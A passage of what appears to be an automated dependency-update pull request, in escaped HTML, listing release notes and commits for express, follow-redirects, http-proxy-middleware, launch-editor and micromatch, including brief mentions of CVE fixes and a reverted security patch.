href=\"https://redirect.github.com/expressjs/express/pull/6506\"\u003eexpressjs/express#6506\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(4.x): wider range for query test skip by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6513\"\u003eexpressjs/express#6513\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003euse tilde notation for certain dependencies by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6905\"\u003eexpressjs/express#6905\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6909\"\u003eexpressjs/express#6909\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for \u003ccode\u003eqs\u003c/code\u003e by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6919\"\u003eexpressjs/express#6919\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.22.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6921\"\u003eexpressjs/express#6921\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.2...4.22.0\"\u003ehttps://github.com/expressjs/express/compare/4.21.2...4.22.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.21.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/blob/v4.22.2/History.md\"\u003eexpress's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e4.22.2 / 2026-05-011\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003efix: restore \u0026gt;20 array parsing for \u003ccode\u003ereq.query\u003c/code\u003e repeated keys (\u003ca href=\"https://github.com/expressjs/express/commit/8d09bfe6d88983da5c3e12cfdd54782c4dc675db\"\u003e\u003ccode\u003e8d09bfe6\u003c/code\u003e\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eThis also unifies array-cap behavior across notations. Indexed notation (\u003ccode\u003ea[0]=...\u003c/code\u003e) was historically capped at qs's default \u003ccode\u003earrayLimit\u003c/code\u003e of 20 even in older qs versions; after this change it also allows up to 1000 items.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: qs@~6.15.1\u003c/li\u003e\n\u003cli\u003edeps: body-parser@~1.20.5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.22.1 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRevert security fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\n\u003cul\u003e\n\u003cli\u003eThe prior release (4.22.0) included an erroneous breaking change related to the extended query parser. There is no actual security vulnerability associated with this behavior (CVE-2024-51999 has been rejected). The change has been fully reverted in this release.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.22.0 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for dependencies\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.2 / 2024-11-06\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.12\n\u003cul\u003e\n\u003cli\u003eFix backtracking protection\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.11\n\u003cul\u003e\n\u003cli\u003eThrows an error on invalid path values\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.1 / 2024-10-08\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported a fix for \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-47764\"\u003eCVE-2024-47764\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.0 / 2024-09-11\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eres.location(\u0026quot;back\u0026quot;)\u003c/code\u003e and \u003ccode\u003eres.redirect(\u0026quot;back\u0026quot;)\u003c/code\u003e magic string\u003c/li\u003e\n\u003cli\u003edeps: serve-static@1.16.2\n\u003cul\u003e\n\u003cli\u003eincludes send@0.19.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: finalhandler@1.3.1\u003c/li\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.20.0 / 2024-09-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: serve-static@0.16.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: send@0.19.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: body-parser@0.6.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/df0abc9333a3398b97b71f6ea7cd77d5ea3e9f97\"\u003e\u003ccode\u003edf0abc9\u003c/code\u003e\u003c/a\u003e 4.22.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/836d36668ea750f78b4373b4de79bbd22634e6ec\"\u003e\u003ccode\u003e836d366\u003c/code\u003e\u003c/a\u003e \u003ccode\u003e4.x\u003c/code\u003e update qs to 6.15.1, body-parser 1.20.5 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/7224\"\u003e#7224\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/8d09bfe6d88983da5c3e12cfdd54782c4dc675db\"\u003e\u003ccode\u003e8d09bfe\u003c/code\u003e\u003c/a\u003e fix: restore array parsing for req.query repeated keys (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/7181\"\u003e#7181\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/d39e8ad1778a0b8a606a5a7b17096d0cc5ec722d\"\u003e\u003ccode\u003ed39e8ad\u003c/code\u003e\u003c/a\u003e deps: body-parser@~1.20.4 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/7021\"\u003e#7021\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/efe85d9fdc9e3a62f7a1121b4f5f484862298b48\"\u003e\u003ccode\u003eefe85d9\u003c/code\u003e\u003c/a\u003e deps: qs@^6.14.1 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6972\"\u003e#6972\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/f62378e1bc776259c0a471476c2dc043a02ac762\"\u003e\u003ccode\u003ef62378e\u003c/code\u003e\u003c/a\u003e 📝 add note to history\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/12fae14531a78f19a2caaa5d4f58d9b01eaf3194\"\u003e\u003ccode\u003e12fae14\u003c/code\u003e\u003c/a\u003e 4.22.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/5ddf311af32e772a77fd48b6266ce2f1ba330e1a\"\u003e\u003ccode\u003e5ddf311\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;sec: security patch for CVE-2024-51999\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/49744abd1120484fe64d7bde1cd3197c32523b6e\"\u003e\u003ccode\u003e49744ab\u003c/code\u003e\u003c/a\u003e 4.22.0 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6921\"\u003e#6921\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/6e97452f600a3b01719fbc5517d833c7646b0bb7\"\u003e\u003ccode\u003e6e97452\u003c/code\u003e\u003c/a\u003e sec: security patch for CVE-2024-51999\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/expressjs/express/compare/4.18.2...v4.22.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jonchurch\"\u003ejonchurch\u003c/a\u003e, a new releaser for express since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.2 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/21ef28a544c5e57f4c34b8476d75f2144609a1eb\"\u003e\u003ccode\u003e21ef28a\u003c/code\u003e\u003c/a\u003e Release version 1.15.11 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7c88135da3bd0681a7e156ee66b16b2f6f98b480\"\u003e\u003ccode\u003e7c88135\u003c/code\u003e\u003c/a\u003e Roll back tree shaking.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/6e389ba094beec211a8847788a146917a16c1bdb\"\u003e\u003ccode\u003e6e389ba\u003c/code\u003e\u003c/a\u003e Release version 1.15.10 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5bc496e0229abda823221e0c6267926a3f93f262\"\u003e\u003ccode\u003e5bc496e\u003c/code\u003e\u003c/a\u003e Shake me up before you go-go.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/694d6b47a42bc8377e5ef1480394de451e16bd5b\"\u003e\u003ccode\u003e694d6b4\u003c/code\u003e\u003c/a\u003e Bump minimist from 1.2.5 to 1.2.8\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.2...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `http-proxy-middleware` from 2.0.6 to 2.0.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/releases\"\u003ehttp-proxy-middleware's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.0.9\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(fixRequestBody): check readableLength by \u003ca href=\"https://github.com/chimurai\"\u003e\u003ccode\u003e@​chimurai\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/pull/1097\"\u003echimurai/http-proxy-middleware#1097\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(package): v2.0.9 by \u003ca href=\"https://github.com/chimurai\"\u003e\u003ccode\u003e@​chimurai\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/pull/1099\"\u003echimurai/http-proxy-middleware#1099\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/compare/v2.0.8...v2.0.9\"\u003ehttps://github.com/chimurai/http-proxy-middleware/compare/v2.0.8...v2.0.9\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.0.8\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(fixRequestBody): prevent multiple .write() calls by \u003ca href=\"https://github.com/chimurai\"\u003e\u003ccode\u003e@​chimurai\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/pull/1090\"\u003echimurai/http-proxy-middleware#1090\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(fixRequestBody): handle invalid request by \u003ca href=\"https://github.com/chimurai\"\u003e\u003ccode\u003e@​chimurai\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/pull/1091\"\u003echimurai/http-proxy-middleware#1091\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(package): v2.0.8 by \u003ca href=\"https://github.com/chimurai\"\u003e\u003ccode\u003e@​chimurai\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/pull/1094\"\u003echimurai/http-proxy-middleware#1094\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/compare/v2.0.7...v2.0.8\"\u003ehttps://github.com/chimurai/http-proxy-middleware/compare/v2.0.7...v2.0.8\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.0.7\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/compare/v2.0.6...v2.0.7\"\u003ehttps://github.com/chimurai/http-proxy-middleware/compare/v2.0.6...v2.0.7\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.0.7-beta.1\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/compare/v2.0.7-beta.0...v2.0.7-beta.1\"\u003ehttps://github.com/chimurai/http-proxy-middleware/compare/v2.0.7-beta.0...v2.0.7-beta.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.0.7-beta.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/compare/v2.0.6...v2.0.7-beta.0\"\u003ehttps://github.com/chimurai/http-proxy-middleware/compare/v2.0.6...v2.0.7-beta.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/blob/v2.0.9/CHANGELOG.md\"\u003ehttp-proxy-middleware's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/releases/tag/v2.0.9\"\u003ev2.0.9\u003c/a\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(fixRequestBody): check readableLength\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/releases/tag/v2.0.8\"\u003ev2.0.8\u003c/a\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(fixRequestBody): prevent multiple .write() calls\u003c/li\u003e\n\u003cli\u003efix(fixRequestBody): handle invalid request\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/releases/tag/v2.0.7\"\u003ev2.0.7\u003c/a\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eci(github actions): add publish.yml\u003c/li\u003e\n\u003cli\u003efix(filter): handle errors\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/617a7c9da9cc90ecc00b0c8b1c2f6a385c879cb1\"\u003e\u003ccode\u003e617a7c9\u003c/code\u003e\u003c/a\u003e chore(package): v2.0.9 (\u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/issues/1099\"\u003e#1099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/d22d58764832fea429d60109a19e1a23136d4425\"\u003e\u003ccode\u003ed22d587\u003c/code\u003e\u003c/a\u003e fix(fixRequestBody): check readableLength (\u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/issues/1097\"\u003e#1097\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/d03d51b54ac8d40db8438a8b216cf1ea92bb7849\"\u003e\u003ccode\u003ed03d51b\u003c/code\u003e\u003c/a\u003e chore(package): v2.0.8 (\u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/issues/1094\"\u003e#1094\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/c50dd06d9102fbb81dd4cbad7a295dddee5f6e1e\"\u003e\u003ccode\u003ec50dd06\u003c/code\u003e\u003c/a\u003e fix(fixRequestBody): handle invalid request (\u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/issues/1091\"\u003e#1091\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/76a9d8d6dc2b971f63df19d805c7ab656540525b\"\u003e\u003ccode\u003e76a9d8d\u003c/code\u003e\u003c/a\u003e fix(fixRequestBody): prevent multiple .write() calls (\u003ca href=\"https://redirect.github.com/chimurai/http-proxy-middleware/issues/1090\"\u003e#1090\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/1e9233909839962bb3c1980848ad499b4757a71d\"\u003e\u003ccode\u003e1e92339\u003c/code\u003e\u003c/a\u003e ci(github-actions): fix npm tag\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/90afb7c9a658b32cc8fe08950bd0926d3bb512c1\"\u003e\u003ccode\u003e90afb7c\u003c/code\u003e\u003c/a\u003e chore(package): v2.0.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/0b4274e8cc9e9a2c5a06f35fbf456ccfcebc55a5\"\u003e\u003ccode\u003e0b4274e\u003c/code\u003e\u003c/a\u003e fix(filter): handle errors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chimurai/http-proxy-middleware/commit/1bd6dd578b1326ed7979c301e3f8eb0f228f5b6f\"\u003e\u003ccode\u003e1bd6dd5\u003c/code\u003e\u003c/a\u003e ci(github actions): add publish.yml\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/chimurai/http-proxy-middleware/compare/v2.0.6...v2.0.9\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `launch-editor` from 2.6.0 to 2.14.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/3f97c648307a70e7c930ba63f040e6ba8e72bc16\"\u003e\u003ccode\u003e3f97c64\u003c/code\u003e\u003c/a\u003e v2.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/0cc9550e05c35224a1f61914b9731723f78c06a7\"\u003e\u003ccode\u003e0cc9550\u003c/code\u003e\u003c/a\u003e fix: reject UNC paths (\u003ca href=\"https://redirect.github.com/vitejs/launch-editor/issues/138\"\u003e#138\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/afd1ab907769adbb0fb76b564551f3cd24822ea6\"\u003e\u003ccode\u003eafd1ab9\u003c/code\u003e\u003c/a\u003e ci: run tests on mac and windows (\u003ca href=\"https://redirect.github.com/vitejs/launch-editor/issues/136\"\u003e#136\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/0bfa328e4d2a70d3accd86645efde43a5a8fd931\"\u003e\u003ccode\u003e0bfa328\u003c/code\u003e\u003c/a\u003e test: add some tests for launch-editor package (\u003ca href=\"https://redirect.github.com/vitejs/launch-editor/issues/135\"\u003e#135\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/1b006ae00061e83628c884770df4869bac481ed3\"\u003e\u003ccode\u003e1b006ae\u003c/code\u003e\u003c/a\u003e chore: add README (\u003ca href=\"https://redirect.github.com/vitejs/launch-editor/issues/134\"\u003e#134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/383ef26fceaaab75e4f122bf833a8d457e187272\"\u003e\u003ccode\u003e383ef26\u003c/code\u003e\u003c/a\u003e v2.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/6277209316b28bd76b057a97fcdfa42da5adc181\"\u003e\u003ccode\u003e6277209\u003c/code\u003e\u003c/a\u003e ci: harden publish settings\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/520b2f787af1bbe3d2333d952547fc90f2c01bb3\"\u003e\u003ccode\u003e520b2f7\u003c/code\u003e\u003c/a\u003e fix(deps): update all non-major dependencies (\u003ca href=\"https://redirect.github.com/vitejs/launch-editor/issues/129\"\u003e#129\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/475ac662aeaa40eebe319f76acf7bd7ff2aba5d5\"\u003e\u003ccode\u003e475ac66\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency lint-staged to v17 (\u003ca href=\"https://redirect.github.com/vitejs/launch-editor/issues/130\"\u003e#130\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/launch-editor/commit/247bf1dfe2c75efb50f507d33c2c5a3cbf4e20d0\"\u003e\u003ccode\u003e247bf1d\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency yorkie to v2 (\u003ca href=\"https://redirect.github.com/vitejs/launch-editor/issues/131\"\u003e#131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vitejs/launch-editor/compare/v2.6.0...v2.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for launch-editor since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `micromatch` from 4.0.4 to 4.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/micromatch/releases\"\u003emicromatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.0.8\u003c/h2\u003e\n\u003cp\u003eUltimate release that fixes both CVE-2024-4067 and CVE-2024-4068. We consider the issues low-priority, so even if you see automated scanners saying otherwise, don't be scared.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/micromatch/blob/master/CHANGELOG.md\"\u003emicromatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.0.8] - 2024-08-22\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebackported CVE-2024-4067 fix (from v4.0.6) over to 4.x branch\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.7] - 2024-05-22\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ethis is basically v4.0.5, with some README updates\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eit is vulnerable to CVE-2024-4067\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003eUpdated braces to v3.0.3 to avoid CVE-2024-4068\u003c/li\u003e\n\u003cli\u003edoes NOT break API compatibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.6] - 2024-05-21\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003ehasBraces\u003c/code\u003e to check if a pattern contains braces.\u003c/li\u003e\n\u003cli\u003eFixes CVE-2024-4067\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBREAKS API COMPATIBILITY\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003eShould be labeled as a major release, but it's not.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.1 - 4.0.5]\u003c/h2\u003e\n\u003ch2\u003e[4.0.0] - 2019-03-20\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdds support for \u003ccode\u003eoptions.onMatch\u003c/code\u003e. See the readme for details\u003c/li\u003e\n\u003cli\u003eAdds support for \u003ccode\u003eoptions.onIgnore\u003c/code\u003e. See the readme for details\u003c/li\u003e\n\u003cli\u003eAdds support for \u003ccode\u003eoptions.onResult\u003c/code\u003e. See the readme for details\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBreaking changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRequire Node.js 